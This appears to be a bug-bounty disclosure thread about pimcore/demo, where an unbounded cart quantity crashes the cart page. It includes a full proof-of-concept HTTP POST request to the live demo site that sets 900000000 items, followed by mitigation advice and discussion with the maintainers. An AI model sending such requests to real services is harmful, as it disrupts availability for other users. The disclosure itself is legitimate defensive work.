Business Logic Errors in pimcore/demo
Reported on
Oct 29th 2021
Description
There is no check over the number of items that a user can add to the cart. Adding a huge amount of items when updating the cart, causes the server to fail returning a 500 Internal Server Error.
Proof of Concept
Below POST request causes the server to fail (adding 900000000 items of the same product). After this POST request, users can't see the cart anymore (they will receive a 500 Internal Server Error).
POST /en/cart HTTP/1.1
Host: demo.pimcore.fun
Cookie: _pc_vis=120b166ae122a7b3; _pc_ses=1635515753969; PHPSESSID=9f6ea63a476c11cbf71a922ec72492d2; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2MzU1MTU3MDEuNzA2MDIsInB0ZyI6eyJfbSI6MSwiX2MiOjE2MzU1MTU1OTcsIl91IjoxNjM1NTE1NzAxLCJ2aTpzcnUiOls3LDFdfSwiZXhwIjoxNjM1NTE3NTAxfQ.dveL3XuGf66wRk59wnA7yMrSuRWPFnEmHuJK4SXDWyY; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2MzU1MTU3MDEuNzA2MjYxLCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6MSwiMTAwNyI6MX0sIl9jIjoxNjM1NTE1NTk3LCJfdSI6MTYzNTUxNTYyOSwidGciOltdfSwiZXhwIjoxNjY3MDUxNzAxfQ.SvwP5gneI2doHDVbtLL1A1TtgZYPc_lu6t3y1FNpi-M
Content-Length: 24
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://demo.pimcore.fun
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://demo.pimcore.fun/en/cart
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9
Connection: close
items%5B235%5D=900000000
Impact
Not a huge impact in terms of security at the moment, but toghether with a CSRF vulnerability, it would be possible to generate a DOS attack.
Mitigation
The application should set a maximum amount of items that can be added to the cart.
Hi @admin, has this report been notified to maintainers? I don't see the usual acknowledge of the notification. Thanks!
@lfama - the outreach process has been recently adjusted - but rest assured, e-mails will be sent out to the maintainers within 24 hours of your original disclosure time.
The maintainers will be notified today of your report.
Cheers!
No worries, we rolled out this change last night but will make it clearer with follow-up improvements on the platform this week.
Thanks for reporting the issue! Just wanted to let you know that we're aware of the issue and we're planning to fix that soon. Since it's not a critical thing (it's a demo), it doesn't have the highest priority as of now.
https://github.com/pimcore/demo/issues/262
Hi,
This is fixed on pimcore/demo not on pimcore/pimcore. please find the fix commit here https://github.com/pimcore/demo/commit/b1c1c51fa0ddfc33dbc2ac7cd161550359252669.
thanks, Divesh
Hi Divesh,
Thank you for the update. @admin I think in this case I should report the disclosure for the other repository, can you please let me know? Thanks
Hello all 👋
We can adjust the repository here, but for clarity, we will need to adjust the bounties as well.
Furthermore, we may revoke the CVE as well, as it looks like this report is against a demo library.
Please confirm if you are happy with this, and I will arrange the switch for you 👍
Hi Jamie,
sure it's fine for me, I wasn't aware that the issue was related only to the demo repo.
Thanks!
Hello Jamie,
I'm also fine with the switch. Thanks for your help!